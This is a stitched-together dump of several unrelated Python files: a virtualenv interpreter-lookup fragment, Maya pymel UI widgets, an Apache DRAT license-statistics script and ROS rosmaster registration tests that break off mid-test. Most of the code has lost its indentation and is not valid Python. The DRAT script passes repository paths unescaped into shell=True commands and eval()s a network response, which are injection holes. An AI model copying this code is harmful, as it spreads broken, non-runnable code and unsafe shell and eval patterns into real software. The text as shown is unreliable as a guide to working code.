name_candidate[candidate] = None
return list(name_candidate.keys())
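    # As an example of the combinations generated above, a CPython 3.8.1 on a 64-bit host
    # with base name "python" yields candidates such as python3.8.1-64, python3.8.1,
    # python3.8-64, python3.8, python3-64, python3, python-64 and python, each further
    # combined with every suffix in EXTENSIONS (the version numbers are illustrative).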
def _possible_base(self):
possible_base = OrderedDict()
basename = os.path.splitext(os.path.basename(self.executable))[0].rstrip(digits)
possible_base[basename] = None
possible_base[self.implementation] = None
        # python is always the final option, as in practice it is used as the exe name by multiple implementations
if "python" in possible_base:
del possible_base["python"]
possible_base["python"] = None
for base in possible_base:
lower = base.lower()
yield lower
from ..info import fs_is_case_sensitive
if fs_is_case_sensitive():
if base != lower:
yield base
upper = base.upper()
if upper != base:
yield upper
if __name__ == "__main__":
# dump a JSON representation of the current python
# noinspection PyProtectedMember
print(PythonInfo()._to_json())
|
|
__author__ = 'Tom'
import pymel.core as pm
import tb_messages as tb_msg
def intEntered(name, *args):
pm.optionVar(intValue=(str(name), args[0]))
class folder_picker():
def __init__(self):
self.main_layout = pm.formLayout()
self.layout = pm.rowLayout(numberOfColumns=3,
adjustableColumn=2,
columnAlign=[1, 'both'],
columnAttach2=['both', 'left'],
parent=self.main_layout
)
self.label = pm.text(parent=self.layout)
self.label2 = pm.text(parent=self.main_layout)
self.folder_field = pm.textField(parent=self.layout)
self.button = pm.symbolButton(parent=self.layout)
def create(self, parent="", label="", option_variable="", top_form="", top_control=""):
pm.formLayout(self.main_layout, edit=True, parent=parent)
pm.text(self.label2, edit=True, label=label)
pm.rowLayout(self.layout,
parent=self.main_layout
)
pm.text(self.label, edit=True, label="")
pm.textField(self.folder_field,
edit=True,
text=pm.optionVar.get(option_variable, 'c:/qss/')
)
pm.symbolButton(self.button,
edit=True,
image="navButtonBrowse.png",
command=lambda *args: self.set_option_dir(option_variable, self.folder_field, args[0])
)
if top_control:
pm.formLayout(
top_form,
edit=True,
attachControl=[self.main_layout, 'top', 0, top_control],
attachForm=[[self.main_layout, 'left', 0],
[self.main_layout, 'right', 0]]
)
elif top_form:
pm.formLayout(
top_form,
edit=True,
attachForm=[[self.main_layout, 'top', 0],
[self.main_layout, 'left', 0],
[self.main_layout, 'right', 0]]
)
# self.attach_form(self.layout, self.main_layout)
FormAttach().attach(self.layout, self.main_layout)
return self.main_layout
@staticmethod
def pin_to_top(attach_form, form):
pass
@staticmethod
def attach_form(attach_form, form):
af = [[attach_form, 'top', 16],
[attach_form, 'left', 16],
[attach_form, 'right', 16],
[attach_form, 'bottom', 16]
]
pm.formLayout(
form,
edit=True,
attachForm=af
)
@staticmethod
def set_option_dir(_name, _field, *args):
_filter = '*.dir'
_start_dir = pm.optionVar.get(_name, pm.workspace(query=True, directory=True))
_result = pm.fileDialog2(startingDirectory=_start_dir,
fileMode=3,
fileFilter=_filter,
dialogStyle=1,
okCaption='pick')
if _result:
pm.optionVar(stringValue=(_name, _result[0] + "/"))
pm.textField(_field, edit=True, text=_result[0])
return _name
class positionWidget():
def __init__(self):
self.positions = tb_msg.Message().positions
def changed(self, name, *args):
pm.optionVar(stringValue=(str(name), args[0]))
def create(self, name='', label=''):
option_Menu = pm.optionMenu(name,
label=label,
changeCommand=lambda *args: self.changed(name, args[0])
)
for pos in tb_msg.Message().positions:
pm.menuItem(label=pos)
default_value = pm.optionVar.get(name, 'topLeft')
pm.optionMenu(option_Menu, edit=True, select=self.positions.index(default_value) + 1)
# return option_Menu
class option_group():
def __init__(self, columns=3):
self.main_layout = pm.formLayout()
self.sub_frameLayout = pm.frameLayout(parent=self.main_layout,
labelVisible=False,
borderStyle='etchedIn'
)
self.sub_formLayout = pm.formLayout(parent=self.sub_frameLayout)
self.layout = None
self.label = pm.text(parent=self.main_layout)
pm.formLayout(
self.main_layout,
edit=True,
attachForm=[[self.sub_frameLayout, 'top', 24],
[self.sub_frameLayout, 'left', 8],
[self.sub_frameLayout, 'right', 12],
[self.sub_frameLayout, 'bottom', 8]]
)
pm.setParent(self.sub_formLayout)
class optionBox():
def _optionCheckBox(self, name="", label="", annotation="", optionVar="", var_list=[]):
if not pm.optionVar(exists=optionVar):
pm.optionVar(stringValue=(optionVar, var_list[0]))
_optionMenu = pm.optionMenu(label=label, changeCommand=lambda *args: self.option_pressed(name, args[0]))
_optionMenuItems = [pm.menuItem(label=var, parent=_optionMenu) for var in var_list]
pm.optionMenu(_optionMenu, edit=True, select=var_list.index(pm.optionVar.get(optionVar))+1)
return _optionMenu
@staticmethod
def option_pressed(name, *args):
pm.optionVar(stringValue=(str(name), args[0]))
def create(self, parent="", label="", columns=3, optionList=[], variable="", positionMenu="", positionLabel="",
messageMenu="", top_form="", top_control="", intField="", intFieldLabel=""):
pm.formLayout(self.main_layout, edit=True, parent=parent)
pm.text(self.label, edit=True, label=label)
if positionMenu:
offset = 1
cLayout = pm.rowLayout(numberOfColumns=3,
adjustableColumn=2,
parent=self.sub_formLayout,
columnAlign=[3, 'right'])
FormAttach().fill_right(cLayout, self.sub_formLayout)
FormAttach().fill_left(cLayout, self.sub_formLayout)
self.layout = pm.rowColumnLayout(numberOfColumns=columns,
columnAlign=[1, 'both'],
parent=cLayout
)
if not isinstance(variable, (list,)):
variable = [variable]
for var in variable:
self.optionBox()._optionCheckBox(optionVar=var,
var_list=optionList,
name=var,
label=var)
'''
if intField:
pm.text(label=intFieldLabel)
pm.intField(parent=self.layout,
width=64,
value=pm.optionVar.get(intField, 2),
changeCommand=lambda *args: intEntered(intField, args[0]))
'''
# spacer
pm.text(label="", parent=cLayout)
if top_control:
pm.formLayout(
top_form,
edit=True,
attachControl=[self.main_layout, 'top', 0, top_control],
attachForm=[[self.main_layout, 'left', 8],
[self.main_layout, 'right', 8]]
)
elif top_form:
pm.formLayout(
top_form,
edit=True,
attachForm=[[self.main_layout, 'top', 24],
[self.main_layout, 'left', 8],
[self.main_layout, 'right', 8]]
)
return self.main_layout
class checkBox_group():
def __init__(self, columns=3):
self.main_layout = pm.formLayout()
self.sub_frameLayout = pm.frameLayout(parent=self.main_layout,
labelVisible=False,
borderStyle='etchedIn'
)
self.sub_formLayout = pm.formLayout(parent=self.sub_frameLayout)
self.layout = None
self.label = pm.text(parent=self.main_layout)
pm.formLayout(
self.main_layout,
edit=True,
attachForm=[[self.sub_frameLayout, 'top', 24],
[self.sub_frameLayout, 'left', 8],
[self.sub_frameLayout, 'right', 12],
[self.sub_frameLayout, 'bottom', 8]]
)
pm.setParent(self.sub_formLayout)
class cBox():
def _optionCheckBox_single(self, name="", label="", annotation="", variable="", defaultValue=False):
_checkBox = pm.checkBox(name, label=label,
value=pm.optionVar.get(variable, defaultValue),
annotation=annotation,
align="right",
changeCommand=lambda *args: self.checkBox_pressed(name, args[0])
)
# hacky way to save the value of the checkbox back to the option var
pm.optionVar(intValue=(variable, pm.optionVar.get(variable, defaultValue)))
return _checkBox
@staticmethod
def checkBox_pressed(name, *args):
pm.optionVar(intValue=(str(name), args[0]))
def _optionCheckBox(self, name="", label="", annotation="", variable=""):
var_list = pm.optionVar.get(variable)
if var_list:
value = name in var_list
else:
value = False
_checkBox = pm.checkBox(name, label=label,
value=value,
annotation=annotation,
changeCommand=lambda *args: self.checkBox_pressed_array(variable, name, args[0])
)
return _checkBox
        @staticmethod
        def checkBox_pressed_array(variable, name, state):
            values = pm.optionVar.get(variable, [''])
            if state:
                # checkbox ticked, add the option to the list
                if name not in values:
                    # not already in the list, so add it
                    pm.optionVar(stringValueAppend=(variable, name))
            else:
                # checkbox unticked, remove it from the list
                if name in values:
                    pm.optionVar(removeFromArray=(variable, values.index(name)))
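    # Example of the flow above (names are illustrative): with variable "alertZones",
    # ticking a "garage" checkbox appends "garage" to the optionVar string array, while
    # unticking it removes the entry at its current index via removeFromArray.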
def create(self, parent="", label="", columns=3, optionList=[], variable="", positionMenu="", positionLabel="",
messageMenu="", top_form="", top_control="", intField="", intFieldLabel=""):
pm.formLayout(self.main_layout, edit=True, parent=parent)
pm.text(self.label, edit=True, label=label)
if positionMenu:
offset = 1
cLayout = pm.rowLayout(numberOfColumns=3,
adjustableColumn=2,
parent=self.sub_formLayout,
columnAlign=[3, 'right'])
FormAttach().fill_right(cLayout, self.sub_formLayout)
FormAttach().fill_left(cLayout, self.sub_formLayout)
self.layout = pm.rowColumnLayout(numberOfColumns=columns,
columnAlign=[1, 'both'],
parent=cLayout
)
'''
if not isinstance(variable, (list,)):
variable = [variable]
'''
for options in optionList:
self.cBox()._optionCheckBox(variable=variable,
name=options,
label=options)
if intField:
pm.text(label=intFieldLabel)
pm.intField(parent=self.layout,
width=64,
value=pm.optionVar.get(intField, 2),
changeCommand=lambda *args: intEntered(intField, args[0]))
# spacer
pm.text(label="", parent=cLayout)
if positionMenu or messageMenu:
# make a rowColumn layout to put our label and option box in nicely
pm.setParent(cLayout)
pm.rowColumnLayout(numberOfColumns=2, columnOffset=(2, "right", 20))
pm.text(label="inView message")
self.cBox()._optionCheckBox_single(variable=variable + "_msg",
name=variable + "_msg",
defaultValue=True)
if positionMenu:
pm.text(label=positionLabel)
positionWidget().create(name=positionMenu)
if top_control:
pm.formLayout(
top_form,
edit=True,
attachControl=[self.main_layout, 'top', 0, top_control],
attachForm=[[self.main_layout, 'left', 8],
[self.main_layout, 'right', 8]]
)
elif top_form:
pm.formLayout(
top_form,
edit=True,
attachForm=[[self.main_layout, 'top', 24],
[self.main_layout, 'left', 8],
[self.main_layout, 'right', 8]]
)
return self.main_layout
class FormAttach():
@staticmethod
def attach(attach_form, form):
af = [[attach_form, 'top', 16],
[attach_form, 'left', 12],
[attach_form, 'right', 12],
[attach_form, 'bottom', 12]
]
pm.formLayout(
form,
edit=True,
attachForm=af
)
@staticmethod
def fill_right(attach_form, form):
af = [[attach_form, 'right', 12]]
pm.formLayout(
form,
edit=True,
attachForm=af
)
@staticmethod
def fill_left(attach_form, form):
af = [[attach_form, 'left', 12]]
pm.formLayout(
form,
edit=True,
attachForm=af
)
@staticmethod
def stretch_down(attach_form, form):
af = [[form, 'bottom', 12]]
pm.formLayout(
attach_form,
edit=True,
attachForm=af
)
@staticmethod
def pin_under(attach_form, form_a, form_b):
af = [[form_a, 'top', 12, form_b]]
pm.formLayout(
attach_form,
edit=True,
attachControl=af
)
|
|
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# This script collects statistics from DRAT run on multiple repositories.
# See the help() method below for usage
# author: karanjeets
import sys
import os
import subprocess
import time
import shutil
import datetime
import csv
import urllib2
import json
import xmlrpclib
import getopt
# Check for environment variables
def check_env_var():
    for var in ("DRAT_HOME", "JAVA_HOME", "OPSUI_URL", "SOLR_URL", "WORKFLOW_URL"):
        if os.getenv(var) is None:
            print "Environment variable $" + var + " is not set."
            sys.exit(1)
# Returns Current Date Time
def current_datetime():
dt = datetime.datetime.now()
return dt.strftime("%Y-%m-%dT%H:%M:%SZ")
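# A sample value from the helper above: "2015-06-01T12:34:56Z". The trailing "Z" makes it
# look like the ISO-8601/UTC format Solr date fields expect, though note that
# datetime.now() actually returns local time, not UTC.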
# Returns a normalized path:
# drops everything up to and including the first "/", replaces remaining "/" with "_",
# and appends the current timestamp
def normalize_path(repository):
tmp = repository[repository.index("/") + 1:]
tmp = tmp.replace("/", "_")
tmp = tmp + "_" + current_datetime()
return tmp
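# For example, a (hypothetical) repository path of "deploy/apache/drat" becomes
# "apache_drat_2015-06-01T12:34:56Z": everything after the first "/" is kept, the
# remaining slashes become underscores, and the current timestamp is appended.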
# Count the number of files in a directory recursively,
# skipping any path that contains the exclude string (e.g. ".svn")
def count_num_files(path, exclude):
count = 0
for root, dirs, files in os.walk(path):
for filename in files:
if exclude not in os.path.join(root, filename):
count += 1
return count
# Prints usage of this script
def help():
print >>sys.stderr, "\n\nUsage: python dratstats.py <path to list of repository URLs> <path to output directory>\n"
# Printing out on Console
def printnow(string):
print string
sys.stdout.flush()
# Parsing RAT log files
def parseFile(filepath):
    with open(filepath, 'r') as f:
        lines = f.readlines()
notes = 0
binaries = 0
archives = 0
standards = 0
apachelicensed = 0
generated = 0
unknown = 0
for line in lines:
if line.startswith('Notes:'):
notes = notes + int(line.split(':')[1].strip())
if line.startswith('Binaries:'):
binaries = binaries + int(line.split(':')[1].strip())
if line.startswith('Archives:'):
archives = archives + int(line.split(':')[1].strip())
if line.startswith('Standards:'):
standards = standards + int(line.split(':')[1].strip())
if line.startswith('Apache Licensed:'):
apachelicensed = apachelicensed + int(line.split(':')[1].strip())
if line.startswith('Generated:'):
generated = generated + int(line.split(':')[1].strip())
if line.find('Unknown Licenses') != -1:
unknown = unknown + int(line.split(' ')[0].strip())
    return (notes, binaries, archives, standards, apachelicensed, generated, unknown)
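# The parser above keys off the summary block of an Apache RAT report; typical lines
# look like the following (counts are illustrative):
#   Notes: 2
#   Binaries: 1
#   Archives: 0
#   Standards: 255
#   Apache Licensed: 230
#   Generated: 0
#   2 Unknown Licenses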
# OODT Process (start, stop)
def oodt_process(command):
try:
retcode = subprocess.call("${DRAT_HOME}/bin/oodt" + " " + command, shell=True)
if retcode < 0:
print >>sys.stderr, "ODDT process was terminated by signal", -retcode, ". OODT failed to " + command + ". Aborting..."
sys.exit(1)
elif retcode > 0:
print >>sys.stderr, "OODT process returned", retcode, ". OODT failed to " + command + ". Aborting..."
sys.exit(1)
except OSError as e:
print >>sys.stderr, "OODT execution failed:", e, ". OODT failed to " + command + ". Aborting..."
sys.exit(1)
# DRAT process (crawl, index, map, reduce)
def drat_process(command, repository):
retval = True
try:
retcode = 0
if command == "crawl" or command == "index":
retcode = subprocess.call("${DRAT_HOME}/bin/drat" + " " + command + " " + repository, shell=True)
elif command == "map" or command == "reduce":
retcode = subprocess.call("nohup ${DRAT_HOME}/bin/drat" + " " + command + " &", shell=True)
if retcode < 0:
print >>sys.stderr, "DRAT " + command + " process was terminated by signal", -retcode, ". Aborting..."
retval = False
elif retcode > 0:
print >>sys.stderr, "DRAT " + command + " process returned", retcode, ". Aborting..."
retval = False
except OSError as e:
print >>sys.stderr, "DRAT " + command + " execution failed:", e, ". Aborting..."
retval = False
return retval
# Reset DRAT
def drat_reset():
printnow ("Removing " + os.getenv("DRAT_HOME") + "/data/workflow")
shutil.rmtree(os.getenv("DRAT_HOME") + "/data/workflow")
printnow ("Removing " + os.getenv("DRAT_HOME") + "/filemgr/catalog")
shutil.rmtree(os.getenv("DRAT_HOME") + "/filemgr/catalog")
printnow ("Removing " + os.getenv("DRAT_HOME") + "/solr/drat/data")
shutil.rmtree(os.getenv("DRAT_HOME") + "/solr/drat/data")
printnow ("Removing " + os.getenv("DRAT_HOME") + "/data/archive")
shutil.rmtree(os.getenv("DRAT_HOME") + "/data/archive")
os.mkdir(os.getenv("DRAT_HOME") + "/data/archive")
printnow ("Removing " + os.getenv("DRAT_HOME") + "/data/jobs")
shutil.rmtree(os.getenv("DRAT_HOME") + "/data/jobs")
os.mkdir(os.getenv("DRAT_HOME") + "/data/jobs")
# Check if there are any pending PGE jobs in the queue
def job_in_queue(job_name):
status = "PGE EXEC"
server = xmlrpclib.ServerProxy(os.getenv("WORKFLOW_URL"), verbose=False)
response = server.workflowmgr.getWorkflowInstancesByStatus(status)
for i in range(0, len(response)):
#print response[i]["sharedContext"]["TaskId"]
if response[i]["sharedContext"]["TaskId"][0] == job_name:
return True
return False
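# Usage sketch: job_in_queue("urn:drat:MimePartitioner") asks the OODT workflow
# manager (XML-RPC at $WORKFLOW_URL) whether any workflow instance currently in
# "PGE EXEC" state belongs to that task id; wait_for_job() below polls on this.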
# Wait for job to complete
def wait_for_job(job_name):
while job_in_queue(job_name):
for i in range(1, 11):
sys.stdout.write('.')
sys.stdout.flush()
time.sleep(2)
# Run DRAT and collect statistics
def run(repos_list, output_dir):
with open(repos_list) as repositories:
for repository in repositories:
repository = repository.strip()
printnow ("\nVerifying repository path...\n")
if not os.path.exists(repository):
printnow ("\nPath " + repository + "is not valid. Skipping and moving on...\n")
continue
printnow ("\nRepository Path: OK\n")
printnow ("\nStarting OODT...\n")
oodt_process("start")
time.sleep(20)
printnow ("\nOODT Started: OK\n")
printnow ("\nRunning DRAT on " + repository + " ...\n")
retval = True
stats = {}
stats['id'] = repository
stats['crawl_start'] = current_datetime()
retval = drat_process("crawl", repository)
stats['crawl_end'] = current_datetime()
if retval:
time.sleep(5)
stats['index_start'] = current_datetime()
retval = drat_process("index", repository)
stats['index_end'] = current_datetime()
if retval:
time.sleep(5)
stats['map_start'] = current_datetime()
retval = drat_process("map", None)
time.sleep(10)
wait_for_job("urn:drat:MimePartitioner")
wait_for_job("urn:drat:RatCodeAudit")
stats['map_end'] = current_datetime()
if retval:
time.sleep(5)
stats['reduce_start'] = current_datetime()
# Extract data from RatAggregate File
totalNotes = 0
totalBinaries = 0
totalArchives = 0
totalStandards = 0
totalApache = 0
totalGenerated = 0
totalUnknown = 0
rat_dir = os.getenv("DRAT_HOME") + "/data/archive/rat"
# Iterate over all RAT log files
for root, dirs, files in os.walk(rat_dir):
for filename in files:
if filename.endswith(".log"):
(notes, binaries, archives,standards,apachelicensed,generated,unknown) = parseFile(os.path.join(root, filename))
totalNotes = totalNotes + notes
totalBinaries = totalBinaries + binaries
totalArchives = totalArchives + archives
totalStandards = totalStandards + standards
totalApache = totalApache + apachelicensed
totalGenerated = totalGenerated + generated
totalUnknown = totalUnknown + unknown
stats["license_Notes"] = totalNotes
stats["license_Binaries"] = totalBinaries
stats["license_Archives"] = totalArchives
stats["license_Standards"] = totalStandards
stats["license_Apache"] = totalApache
stats["license_Generated"] = totalGenerated
stats["license_Unknown"] = totalUnknown
stats['reduce_end'] = current_datetime()
print "\nDRAT Scan Completed: OK\n"
time.sleep(5)
if retval:
# Copy Data with datetime variables above, extract output from RatAggregate file, extract data from Solr Core
printnow ("\nCopying data to Solr and Output Directory...\n")
# Extract data from Solr
neg_mimetype = ["image", "application", "text", "video", "audio", "message", "multipart"]
connection = urllib2.urlopen(os.getenv("SOLR_URL") + "/drat/select?q=*%3A*&rows=0&facet=true&facet.field=mimetype&wt=python&indent=true")
                response = eval(connection.read())  # wt=python makes Solr return a python literal, which eval() parses
mime_count = response["facet_counts"]["facet_fields"]["mimetype"]
for i in range(0, len(mime_count), 2):
if mime_count[i].split("/")[0] not in neg_mimetype:
stats["mime_" + mime_count[i]] = mime_count[i + 1]
# Count the number of files
stats["files"] = count_num_files(repository, ".svn")
# Write data into Solr
stats_data = []
stats_data.append(stats)
json_data = json.dumps(stats_data)
printnow (json_data)
request = urllib2.Request(os.getenv("SOLR_URL") + "/statistics/update/json?commit=true")
request.add_header('Content-type', 'application/json')
urllib2.urlopen(request, json_data)
# Copying data to Output Directory
repos_out = output_dir + "/" + normalize_path(repository)
shutil.copytree(os.getenv("DRAT_HOME") + "/data", repos_out)
printnow ("\nData copied to Solr and Output Directory: OK\n")
else:
printnow ("\nDRAT Scan Completed: Resulted in Error\n")
time.sleep(5)
printnow ("\nStopping OODT...\n")
oodt_process("stop")
time.sleep(20)
printnow ("\nOODT Stopped: OK\n")
printnow ("\nReseting DRAT...\n")
drat_reset()
time.sleep(5)
printnow ("\nDRAT Reset: OK\n")
printnow ("\nDRAT SCAN COMPLETED!!!\n")
# This is where it all begins
def main():
    if len(sys.argv) != 3:
        print >>sys.stderr, "\nIncorrect number of arguments passed. Aborting..."
        help()
        sys.exit(1)
    repos_list = sys.argv[1]
    output_dir = sys.argv[2]
if not os.path.isfile(repos_list):
print >>sys.stderr, "\nRepository list doesn't exists at the path: ", repos_list
help()
sys.exit(1)
if not os.path.isdir(output_dir):
print >>sys.stderr, "\nOutput Directory doesn't exist at the path: ", output_dir
help()
sys.exit(1)
check_env_var()
run(repos_list, output_dir)
if __name__ == "__main__":
main()
|
|
# Software License Agreement (BSD License)
#
# Copyright (c) 2008, Willow Garage, Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of Willow Garage, Inc. nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
import os
import sys
import unittest
import time
# mock thread pool for the registration tests below
class ThreadPoolMock(object):
def queue_task(*args): pass
class TestRosmasterRegistrations(unittest.TestCase):
def test_NodeRef_services(self):
from rosmaster.registrations import NodeRef, Registrations
n = NodeRef('n1', 'http://localhost:1234')
# test services
n.add(Registrations.SERVICE, 'add_two_ints')
self.failIf(n.is_empty())
self.assert_('add_two_ints' in n.services)
self.assertEquals(['add_two_ints'], n.services)
n.add(Registrations.SERVICE, 'add_three_ints')
self.failIf(n.is_empty())
self.assert_('add_three_ints' in n.services)
self.assert_('add_two_ints' in n.services)
n.remove(Registrations.SERVICE, 'add_two_ints')
self.assert_('add_three_ints' in n.services)
self.assertEquals(['add_three_ints'], n.services)
self.failIf('add_two_ints' in n.services)
self.failIf(n.is_empty())
n.remove(Registrations.SERVICE, 'add_three_ints')
self.failIf('add_three_ints' in n.services)
self.failIf('add_two_ints' in n.services)
self.assertEquals([], n.services)
self.assert_(n.is_empty())
def test_NodeRef_subs(self):
from rosmaster.registrations import NodeRef, Registrations
n = NodeRef('n1', 'http://localhost:1234')
        # test topic subscriptions
n.add(Registrations.TOPIC_SUBSCRIPTIONS, 'topic1')
self.failIf(n.is_empty())
self.assert_('topic1' in n.topic_subscriptions)
self.assertEquals(['topic1'], n.topic_subscriptions)
n.add(Registrations.TOPIC_SUBSCRIPTIONS, 'topic2')
self.failIf(n.is_empty())
self.assert_('topic2' in n.topic_subscriptions)
self.assert_('topic1' in n.topic_subscriptions)
n.remove(Registrations.TOPIC_SUBSCRIPTIONS, 'topic1')
self.assert_('topic2' in n.topic_subscriptions)
self.assertEquals(['topic2'], n.topic_subscriptions)
self.failIf('topic1' in n.topic_subscriptions)
self.failIf(n.is_empty())
n.remove(Registrations.TOPIC_SUBSCRIPTIONS, 'topic2')
self.failIf('topic2' in n.topic_subscriptions)
self.failIf('topic1' in n.topic_subscriptions)
self.assertEquals([], n.topic_subscriptions)
self.assert_(n.is_empty())
def test_NodeRef_pubs(self):
from rosmaster.registrations import NodeRef, Registrations
n = NodeRef('n1', 'http://localhost:1234')
# test topic publications
n.add(Registrations.TOPIC_PUBLICATIONS, 'topic1')
self.failIf(n.is_empty())
self.assert_('topic1' in n.topic_publications)
self.assertEquals(['topic1'], n.topic_publications)
n.add(Registrations.TOPIC_PUBLICATIONS, 'topic2')
self.failIf(n.is_empty())
self.assert_('topic2' in n.topic_publications)
self.assert_('topic1' in n.topic_publications)
n.remove(Registrations.TOPIC_PUBLICATIONS, 'topic1')
self.assert_('topic2' in n.topic_publications)
self.assertEquals(['topic2'], n.topic_publications)
self.failIf('topic1' in n.topic_publications)
self.failIf(n.is_empty())
n.remove(Registrations.TOPIC_PUBLICATIONS, 'topic2')
self.failIf('topic2' in n.topic_publications)
self.failIf('topic1' in n.topic_publications)
self.assertEquals([], n.topic_publications)
self.assert_(n.is_empty())
def test_NodeRef_base(self):
import rosmaster.exceptions
from rosmaster.registrations import NodeRef, Registrations
n = NodeRef('n1', 'http://localhost:1234')
self.assertEquals('http://localhost:1234', n.api)
self.assertEquals([], n.param_subscriptions)
self.assertEquals([], n.topic_subscriptions)
self.assertEquals([], n.topic_publications)
self.assertEquals([], n.services)
self.assert_(n.is_empty())
try:
n.add(12345, 'topic')
self.fail("should have failed with invalid type")
except rosmaster.exceptions.InternalException: pass
try:
n.remove(12345, 'topic')
self.fail("should have failed with invalid type")
except rosmaster.exceptions.InternalException: pass
n.add(Registrations.TOPIC_PUBLICATIONS, 'topic1')
n.add(Registrations.TOPIC_PUBLICATIONS, 'topic2')
n.add(Registrations.TOPIC_SUBSCRIPTIONS, 'topic2')
n.add(Registrations.TOPIC_SUBSCRIPTIONS, 'topic3')
n.add(Registrations.PARAM_SUBSCRIPTIONS, 'topic4')
n.add(Registrations.SERVICE, 'serv')
self.failIf(n.is_empty())
n.clear()
self.assert_(n.is_empty())
def test_NodeRef_param_subs(self):
from rosmaster.registrations import NodeRef, Registrations
n = NodeRef('n1', 'http://localhost:1234')
        # test param subscriptions
n.add(Registrations.PARAM_SUBSCRIPTIONS, 'param1')
self.failIf(n.is_empty())
self.assert_('param1' in n.param_subscriptions)
self.assertEquals(['param1'], n.param_subscriptions)
n.add(Registrations.PARAM_SUBSCRIPTIONS, 'param2')
self.failIf(n.is_empty())
self.assert_('param2' in n.param_subscriptions)
self.assert_('param1' in n.param_subscriptions)
n.remove(Registrations.PARAM_SUBSCRIPTIONS, 'param1')
self.assert_('param2' in n.param_subscriptions)
self.assertEquals(['param2'], n.param_subscriptions)
self.failIf('param1' in n.param_subscriptions)
self.failIf(n.is_empty())
n.remove(Registrations.PARAM_SUBSCRIPTIONS, 'param2')
self.failIf('param2' in n.param_subscriptions)
self.failIf('param1' in n.param_subscriptions)
self.assertEquals([], n.param_subscriptions)
self.assert_(n.is_empty())
## subroutine of registration tests that test topic/param type Reg objects
## @param r Registrations: initialized registrations object to test
def _subtest_Registrations_basic(self, r):
#NOTE: no real difference between topic and param names, so tests are reusable
# - note that we've updated node1's API
r.register('topic1', 'node1', 'http://node1:5678')
self.assert_('topic1' in r) # test contains
self.assert_(r.has_key('topic1')) # test contains
self.assertEquals(['topic1'], [k for k in r.iterkeys()])
self.assertEquals(['http://node1:5678'], r.get_apis('topic1'))
self.assertEquals([('node1', 'http://node1:5678')], r['topic1'])
self.failIf(not r) #test nonzero
self.assertEquals(None, r.get_service_api('topic1')) #make sure no contamination
self.assertEquals([['topic1', ['node1']]], r.get_state())
r.register('topic1', 'node2', 'http://node2:5678')
self.assertEquals(['topic1'], [k for k in r.iterkeys()])
self.assertEquals(['topic1'], [k for k in r.iterkeys()])
self.assertEquals(2, len(r.get_apis('topic1')))
self.assert_('http://node1:5678' in r.get_apis('topic1'))
self.assert_('http://node2:5678' in r.get_apis('topic1'))
self.assertEquals(2, len(r['topic1']))
self.assert_(('node1', 'http://node1:5678') in r['topic1'], r['topic1'])
self.assert_(('node2', 'http://node2:5678') in r['topic1'])
self.assertEquals([['topic1', ['node1', 'node2']]], r.get_state())
        # register a second topic
r.register('topic2', 'node3', 'http://node3:5678')
self.assert_('topic2' in r) # test contains
self.assert_(r.has_key('topic2')) # test contains
self.assert_('topic1' in [k for k in r.iterkeys()])
self.assert_('topic2' in [k for k in r.iterkeys()])
self.assertEquals(['http://node3:5678'], r.get_apis('topic2'))
self.assertEquals([('node3', 'http://node3:5678')], r['topic2'])
self.failIf(not r) #test nonzero
self.assert_(['topic1', ['node1', 'node2']] in r.get_state(), r.get_state())
self.assert_(['topic2', ['node3']] in r.get_state(), r.get_state())
# Unregister
# - fail if node is not registered
code, _, val = r.unregister('topic1', 'node3', 'http://node3:5678')
self.assertEquals(0, val)
# - fail if topic is not registered by that node
code, _, val = r.unregister('topic2', 'node2', 'http://node2:5678')
self.assertEquals(0, val)
# - fail if URI does not match
code, _, val = r.unregister('topic2', 'node2', 'http://fakenode2:5678')
self.assertEquals(0, val)
        # - unregister node1
code, _, val = r.unregister('topic1', 'node1', 'http://node1:5678')
self.assertEquals(1, code)
self.assertEquals(1, val)
self.assert_('topic1' in r) # test contains
self.assert_(r.has_key('topic1'))
self.assert_('topic1' in [k for k in r.iterkeys()])
self.assert_('topic2' in [k for k in r.iterkeys()])
self.assertEquals(['http://node2:5678'], r.get_apis('topic1'))
self.assertEquals([('node2', 'http://node2:5678')], r['topic1'])
self.failIf(not r) #test nonzero
self.assert_(['topic1', ['node2']] in r.get_state())
self.assert_(['topic2', ['node3']] in r.get_state())
code, _, val = r.unregister('topic1', 'node2', 'http://node2:5678')
self.assertEquals(1, code)
self.assertEquals(1, val)
self.failIf('topic1' in r) # test contains
self.failIf(r.has_key('topic1'))
self.assertEquals(['topic2'], [k for k in r.iterkeys()])
self.assertEquals([], r.get_apis('topic1'))
self.assertEquals([], r['topic1'])
self.failIf(not r) #test nonzero
self.assertEquals([['topic2', ['node3']]], r.get_state())
# clear out last reg
code, _, val = r.unregister('topic2', 'node3', 'http://node3:5678')
